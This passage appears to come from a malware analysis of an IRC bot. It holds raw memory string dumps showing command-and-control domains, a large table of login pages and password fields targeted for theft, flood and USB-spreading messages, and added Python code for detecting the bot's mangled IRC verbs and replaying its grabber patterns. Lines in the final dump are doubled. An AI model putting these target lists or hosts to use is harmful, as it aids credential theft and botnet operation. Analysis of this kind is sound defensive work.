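_COMMAND = re.compile(rb"^(?:@\S+ )?(?::\S+ )?([A-Z]+)(?:\s+(.*))?$")


def classify_irc_lines(payload: bytes) -> List[Tuple[bytes, bytes, bytes]]:
    """Return (verb_as_seen, normalized_verb, arguments) for each command line.

    Mangled verbs are normalized to the standard verb they stand in for;
    plain verbs map to themselves; anything else is ignored.
    """
    rows = []
    for line in re.split(rb"\r?\n", payload):
        match = _COMMAND.match(line.strip())
        if not match:
            continue
        verb, args = match.group(1), match.group(2) or b""
        if verb in MANGLED_VERBS:
            rows.append((verb, MANGLED_VERBS[verb], args))
        elif verb in PLAIN_VERBS or verb in MANGLED_VERBS.values():
            rows.append((verb, verb, args))
    return rows


def is_mangled_irc_session(payload: bytes, min_hits: int = 2) -> bool:
    """True when at least min_hits command lines use a mangled verb.

    Two hits rather than one keeps a lone coincidental token (a nick or a
    chat message that happens to start with "PPNG") from firing the rule.
    """
    hits = sum(1 for seen, norm, _ in classify_irc_lines(payload) if seen != norm)
    return hits >= min_hits


# Constructed sample payloads (not captured traffic).
SAMPLE_BOT_HELLO = (
    b"PASS secret\r\n"
    b"KCIK w7abc\r\n"
    b"SSRR w7abc 0 0 :w7abc\r\n"
    b"JOIN #x\r\n"
    b"PPNG :irc.example.invalid\r\n"
)
SAMPLE_NORMAL_CLIENT = b"NICK alice\r\nUSER alice 0 * :Alice\r\nJOIN #chan\r\n"

if __name__ == "__main__":
    for seen, norm, args in classify_irc_lines(SAMPLE_BOT_HELLO):
        print(f"{seen.decode():8} -> {norm.decode():8} {args.decode()}")
    print("mangled session:", is_mangled_irc_session(SAMPLE_BOT_HELLO))
```

The same verb table is what the dump's own "Detected process ... sending an IRC packet" hooks do in reverse: they watch for the plain PRIVMSG and JOIN strings in other processes' traffic, so a detection that only knows the standard verbs sees the competitor bots this sample blocks and misses the sample itself.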
svchost.exe_2060_rwx_001B0000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0
Fv.TBv
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Mozilla/4.0
\\.\PHYSICALDRIVE0
shell32.dll
httpi
dnsapi.dll
hXXp://%s/%s
hXXp://%s/
POST /23s
[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
%s|%s
[Logins]: Cleared %d logins
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
shellexecute=
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
.Trashes
\\.\%c:
%s\%s
%sautorun.tmp
%sautorun.inf
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
*facebook.*/ajax/chat/send.php*
-_.!~*'()
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Content-Length: %d
SDG %d
%s_0xX
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestA
NtEnumerateValueKey
DNSAPI.dll
Secur32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
HttpQueryInfoW
WININET.dll
SHLWAPI.dll
WS2_32.dll
MSVCRT.dll
GetProcessHeap
ConnectNamedPipe
CreateNamedPipeA
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryA
KERNEL32.dll
USER32.dll
RegCloseKey
RegNotifyChangeKeyValue
RegOpenKeyExA
ADVAPI32.dll
ole32.dll
a.baerr000.ru
a.joerv06.com
a.tsroxybaa.com
fbi.gov
]1.1.0.0
msn.set
msn.int
http.set
http.int
http.inj
logins
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
SSRR %s 0 0 :%s
KCIK %s
SEND %s %s
PART %s
PPPPMSG %s :%s
QUIT :%s
PPNG %s
PPPPMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
ftpinfect
httplogin
httptraff
httpspread
hXXp://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\312a36d2
C:\Windows\system32\svchost.exe
C:\Windows
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe
7 767
8*808;8~8
%s\Microsoft\%s.exe
\\.\pipe
Internet Explorer\iexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%S\Desktop.ini
winlogon.exe
mspaint.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
Akernel23.dll
y%s\%s.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\Windows\System32\svchost.exe
8C:\Windows\system32\svchost.exe
c:\%original file name%.exe
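The wildcard URL patterns in this region (from "*members*.iknowthatgirl*/members*" down to "*paypal.*/webscr?cmd=_login-submit*"), the bare field names next to them (login_email, Passwd, session[password], ...) and the "*field=*" body patterns are the form grabber's target table: the hooked HttpSendRequest sees every POST the browser makes, and these decide which ones become "[HTTP Login]" reports. The following is an added example, not code from the Lavasoft report or from the bot, that replays a subset of those patterns against sample requests so an analyst can see which sites and fields a given request would leak. The patterns and field names are copied from the strings above; that "*" matches any run of characters, that matching is case-sensitive and in full, and that both a URL pattern and a body pattern must match are my assumptions about how the bot applies them (the dump shows the tables, not the matcher). The sample requests are constructed.

```python
"""Replay the form-grabber URL and POST-body patterns from the dump.

Added example, not code from the Lavasoft report or from the bot. The
patterns and field names are copied from the strings above; that '*'
matches any run of characters, that matching is case-sensitive and that a
request is logged only when both a URL pattern and a body pattern match are
my assumptions about how the bot applies them.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl

# A subset of the URL patterns from the dump. 2082/2083/2086 are the ports
# cPanel and WHM listen on, 2222 is DirectAdmin's.
URL_PATTERNS: List[str] = [
    "*paypal.*/webscr?cmd=_login-submit*",
    "*google.*/*ServiceLoginAuth*",
    "*facebook.*/login.php*",
    "*login.live.*/*post.srf*",
    "*twitter.com/sessions",
    "*signin.ebay*SignIn",
    "*godaddy.com/login*",
    "*:2082/login*",
    "*:2083/login*",
    "*:2086/login*",
    "*:2222/CMD_LOGIN*",
]
# POST-body patterns and the field names that appear beside them in the dump.
BODY_PATTERNS: List[str] = [
    "*login_password=*", "*Passwd=*", "*LoginPassword=*", "*&txtPassword=*",
    "*password]=*", "*password=*", "*passwd=*", "*pass=*",
]
FIELD_NAMES = {
    "login_email", "login_password", "Passwd", "LoginUserName", "LoginPassword",
    "txtPassword", "session[password]", "login[username]", "login[password]",
    "loginId", "password", "login", "passwd", "quick_password",
}


def glob_to_regex(pattern: str):
    """'*' -> any run of characters; everything else is literal. Translating
    by hand keeps the literal '?' in the PayPal pattern literal, which
    fnmatch would turn into a one-character wildcard."""
    return re.compile(".*".join(re.escape(part) for part in pattern.split("*")), re.DOTALL)


def first_match(patterns: List[str], text: str) -> Optional[str]:
    """The first pattern that matches text in full, or None."""
    for pattern in patterns:
        if glob_to_regex(pattern).fullmatch(text):
            return pattern
    return None


def grab(url: str, body: str) -> Optional[Dict[str, object]]:
    """What the grabber would log for one POST, or None if it is not a target.

    Both a URL pattern and a body pattern must match; the captured fields are
    the body parameters whose names are in FIELD_NAMES.
    """
    url_pattern = first_match(URL_PATTERNS, url)
    body_pattern = first_match(BODY_PATTERNS, body)
    if url_pattern is None or body_pattern is None:
        return None
    fields = {k: v for k, v in parse_qsl(body, keep_blank_values=True) if k in FIELD_NAMES}
    return {"url_pattern": url_pattern, "body_pattern": body_pattern, "fields": fields}


# Constructed sample request (not captured traffic).
SAMPLE_URL = "https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&dispatch=abc"
SAMPLE_BODY = "login_email=alice%40example.invalid&login_password=hunter2&submit=Log+In"

if __name__ == "__main__":
    print(grab(SAMPLE_URL, SAMPLE_BODY))
    # "*twitter.com/sessions" has no trailing '*', so a query string defeats it.
    print(grab("https://twitter.com/sessions?x=1", "session[password]=pw"))
```

Two details of the table are worth checking against real traffic rather than assuming: patterns without a trailing "*" (for example "*twitter.com/sessions" and "*signin.ebay*SignIn") only match when the URL ends exactly there, and the generic body patterns ("*password=*", "*pass=*") mean any site whose URL matches is harvested even if its field names are not in the list, since the pattern, not the field name, gates the capture.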
mspaint.exe_316:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
GDI32.dll
USER32.dll
MFC42u.dll
msvcrt.dll
COMDLG32.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
PROPSYS.dll
RPCRT4.dll
WINMM.dll
VERSION.dll
Bv.TBv
%s#IZ
j SSSSSSSh
t;Ht.Ht!Ht
COMDLG32.DLL
SSSSh
@t8HHt.Ht&Ht
JtmJtXJtCJt.Jt
Invalid parameter passed to C runtime function.
Ht\HtEHt.Ht
gdiplus.dll
GdiplusShutdown
GdipSetPenLineJoin
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegEnumKeyExW
GetProcessHeap
SetViewportExtEx
GetKeyboardLayout
MsgWaitForMultipleObjectsEx
GetKeyState
_amsg_exit
_wcmdln
__crtLCMapStringW
__crtGetStringTypeW
ShellExecuteExW
mspaint.pdb
.PAVCObject@@
.PAVCException@@
.PAVCFileException@@
.PAVCMemoryException@@
.PAVCResourceException@@
.?AVCCmdTarget@@
.?AVCDummyCmdUI@@
.?AVCCmdUI@@
.?AVCOperation@@
.?AVCDrawAutoShapeOperation@@
.?AVCDrawShapeOperation@@
.?AVCOperationStockImpl@@
.?AVCDrawRectAutoShapeOperation@@
.?AVCDrawPolygonOperation@@
.?AVCDrawBezierOperation@@
.?AVCDrawLineOperation@@
.?AVCDrawStrokeOperation@@
.?AV?$CComObject@VCRTSPacketHandler@@@ATL@@
.?AVCRTSPacketHandler@@
.?AV?$StylusPluginImpl@UIStylusAsyncPlugin@@VCRTSPacketHandler@@@@
.?AVCRTSStylusHandler@@
name="Microsoft.Windows.Shell.mspaint"
version="5.1.0.0"
Windows Shell
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
true
KEYW
3993831$5
lb_BB-%F
e&;%fn
Þp`,
.ET.0y
.pppF
/888 888
>888)888
9888#888
888ˆ8/
888!888)8881
888 888$888)88808884
3888(888
7888&888
888 888(8881
888#888(888/8883
>888;88878887888:
2229222
2220222
888 888ˆ8 8881
9%%$"555
6"#"5,, '556
P&&&M,, I223F999B@@@
$%%f f112f888f???fFFFeNMMcUUU`\\\[edeSlllHttt>|||1
Paint.NET v3.36
.iu[mr
hn/.nzu
.zD.k
.pnye%
y9>>.GGG
x<.ggg>
g9>>.www]
x-|.Nh
%.WEn\
%xE.h
dz.yqI
1.WI[
73.ZW/
u.WL*
3twwW...
=.AAZ
;%CMn
$8z^.aUJ.;]
L0.vvv
.teaD#
Hq.vX=
9;
%F&%}
L%xQ*S
qnn.VVV
Z&.NOOG
!nnn.noo
.Jdjr9jH
l.nY:
fs.ONN
.KIRn
b .dA)
t%xg?
.PV"8!h H
%s899
.KM/--
6>t%X
...lww
-\|%U
u_U%X
.VVV|
~,..fq
/..fo
j[^^.xA
Q3%x2
aSSS!.DC
\.gL1
xiA.Hs
W^y%...bkk
_.do>
VP%s7,
p.TG@
'''.MMy
.IIeJ
D%uPT]
JÿFp8
\.zzz
.Egyy9
%%%XXX
$%s}}
$;;;1::*
aYsssH
fhI)..FYY
8a ..FEE
3>..NR
SSSHKK
.FGGQ[[
\.looK
$.UVV
\.LOOcaa
.yeeE.
x.%DQb
.lmm)
(..VL
(..VH
.ZYYQ
;L!%C
^/..Fgg
QUU%C
J*..FYY
%2SSS
.KTN"
.XPP (
)B!.Qh
Enn.ZZZD#
7x.lllHp
x.ND
x<.jg>
J%ciR
W_}%S
Ynn.VWW%
S^^.UfVV
sssHOO
\.TVV"''GC;
.f.FZZ
Nnn.jjjT
#QJ.Xl
sG.Tz
O=>>.AD
mnn.ZZZd
* %x
d.TWW
(..Fvv
\.TVV
g%%%x
$j[x.Qm
sssHII
sssHLL
-..bnn
\.ddd
\.LOO#33
.yeeEv
BhjjBeeÿfPPP
.TWWC
(..FSS
.aV6q
T*%cY
WwwwW.
%2uxx(
*&&&0
_.ZlxI
-Qe}tt
P,0%%%X\\
3a.nN
.loo
ÚZV,
..FQQ
@,..biiI
.bK>?
.whQQ
u,..bkk
.ED|/I
-.fff
AOO%s
677199)/7
9,..btt
jEnn.FFF
ssshhh
'##C%C
{{{%8:88
.gff$B
^.wmrW'
:9&&&066
Z[[%C$
\.LNN
hToo/FGG%C
.JKKQUU
FM.yYY
.UUU"
\.gnn
\.gkk
\.vvvP
\.GGG
\.Gzz:s
-..bee
\.dgg#77
,..rAK
ssshnnf6t~~>^
,..fQZ0
Jÿf
Bee%u
Z-fggq}}M
U)..Fjj
.xR(/--
\.lll 55
[[[(..FEE
(..Fii)
HMM%.U 3
...prr
...pqq
\.gD6
Ajf%c
(..Fee%
\.LLL
.pS#qD
%X!|NNNrJ*
\.Ggg
-= (**
C:\T*
J%fgg
=)..Fnn
sssH$
KKKQ^^.IV
...PTT
...PSS
sl!.JT
sssHKK
\.LOO#//
uÃŒc(((
I,..rQ
\.Gzz:
\.TWWcxx
J%FGG9
gx4.jiiAEE
sssHJJ
ZQsssHHH@$
`.zEE
d2,..bvv
XZZBnn.VWW
hkkCoo/%D
,..bdd
La ..Fyy9
]]](((@
E,..bee
A,..boo
(..fqXnn.
...PUU
%Unrr
...RD
hr.PX
(..ft133
(..fu
,..bee
B4?...Rb
q,..bpp
...frB
\.twwcdd
g.vOO
SSShhh
N.ZZZ
N4.GGG
(..Fee
}A.dJ
B%Duo2
ssshll
Qnn.VVV
/.myq
Onn.rss
Cnn.VWW
q.Hl}
888@}}=._
(..FCC
\.Gaa!
.TUUq
"/..fh
.RSS111
RvÞe
4.rgddd@
MceeÃ’
,R.Sw
%Mgr.RhY4RfE5Qd:5w
y'MfR Og>-Qh".Sj
Kha"OjR(RkB.Sj42Sh04Re15Re!5Rf
Nkh$RnZ)VoH.Wn92Wn.5Vk'6Th 5Qe
.CFHSW\`}{
poq.uuv
ppq.qpq
{Q.JqK*
|R.vuN,
dB%sb@$
mH('iE'$fC&Û% b@$p`?#
dB%ubA$
{R.VxO-
|R.cvN,
8)9/959:9}9
:&;,;0;4;
7,707…8
7u7D7L7`7f7k7q7w7~7
8 8$8(8,808
: :$:(:,:0:4:8:
3=3p3
2 2$2(2,2024282
7Â8K8n8
$040]0{0
? ?8?`?|?
Microsoft\Windows\CurrentVersion\Applets
MSFTEDIT.DLL
.Ribbon
Software\Microsoft\Windows\CurrentVersion\Applets\
.gdi32.dll
\StringFileInfo\xx\OriginalFilename
\sppsvc.exe
\slui.exe
\sppuinotify.dll
%u%su
mshelp://windows/?id=379810ee-75d9-4d02-a3b9-68cad94146aa
DataCallback: Reason=%d Stat=%d %$=%d Offset=%d Length=%d Buf=%p
CoGetInterfaceAndReleaseStream HRESULT=x
CoInitialize HRESULT=x
CreateThread LastError=x
idtGetBandedData HRESULT=x
WriteMultiple HRESULT=x
DeviceDlg HRESULT=x
SelectDeviceDlg HRESULT=x
Software\%s\%s\%s
Microsoft-Windows-MSPaint/Admin
Microsoft-Windows-MSPaint/Diagnostic
Microsoft-Windows-MSPaint/Debug
Save operation result
Resize skew Operation result
FlipOperation
RotateOperation
CropOperation
InvertColorOperation
ResizeSkewOperation
6.1.7600.16385 (win7_rtm.090713-1255)
MSPAINT.EXE
Windows
Operating System
6.1.7600.16385
svchost.exe_2972:
.text
`.data
.rsrc
@.reloc
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
ole32.dll
ntdll.dll
_amsg_exit
RegCloseKey
RegOpenKeyExW
GetProcessHeap
svchost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
Host Process for Windows Services
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
Windows
Operating System
6.1.7600.16385
mspaint.exe_316_rwx_03660000_0004E000:
.text
`.rdata
@.data
.reloc
=MSG t
>MSG u`
=PASS
8httpu1
8httpuM
tlSSSSSSSSSShL0g
Fv.TBv
%s.%s
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
CAL %d %6s
ngr->blocksize: %d
block_size: %d
\\.\pipe\%s
kernel32.dll
%s_%d
-%sMutex
ntdll.dll
%s-pid
%s-comm
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
JOIN %5s
PRIVMSG
JOIN
%s:%d
%s.%s%s
%S%s%s
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
virusbuster.nprotect.
heck.tc
onecare.live.
login[password]
login[username]
*members*.iknowthatgirl*/members*
*youporn.*/login*
*members.brazzers.com*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
loginid
*enom.com/login*
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
*moniker.com/*Login*
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
loginname
*godaddy.com/login*
Password
*Password=*
*alertpay.com/login*
*netflix.com/*ogin*
*thepiratebay.org/login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*what.cd/login*
*oron.com/login*
*filesonic.com/*login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploading.com/*login*
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
*hotfile.com/login*
*4shared.com/login*
txtpass
*txtpass=*
*netload.in/index*
*freakshare.com/login*
login_pass
*login_pass=*
*mediafire.com/*login*
*sendspace.com/login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
session[password]
*password]=*
*twitter.com/sessions
txtPassword
*&txtPassword=*
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*&password=*
*no-ip*/login*
*steampowered*/login*
quick_password
*hackforums.*/member.php
*facebook.*/login.php*
*login.yahoo.*/*login*
passwd
login
*passwd=*
*login.live.*/*post.srf*
TextfieldPassword
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
FLN-Password
*FLN-Password=*
*pass=*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
*google.*/*ServiceLoginAuth*
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
hXXp://%s/%s
hXXp://%s/%s
hXXp://%s/
hXXp://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
hXXp://
hXXp://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Ã%%%s
&&%%windir%%\explorer.exe %Ã%%%s
/c "start %Ã%%.Trashes\%s
/c "start %Ã%%.Trashes\%s
.Trashes
.Trashes
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.scr
%0x.scr
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
a.baerr000.ru
a.baerr000.ru
a.joerv06.com
a.joerv06.com
a.tsroxybaa.com
a.tsroxybaa.com
fbi.gov
fbi.gov
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
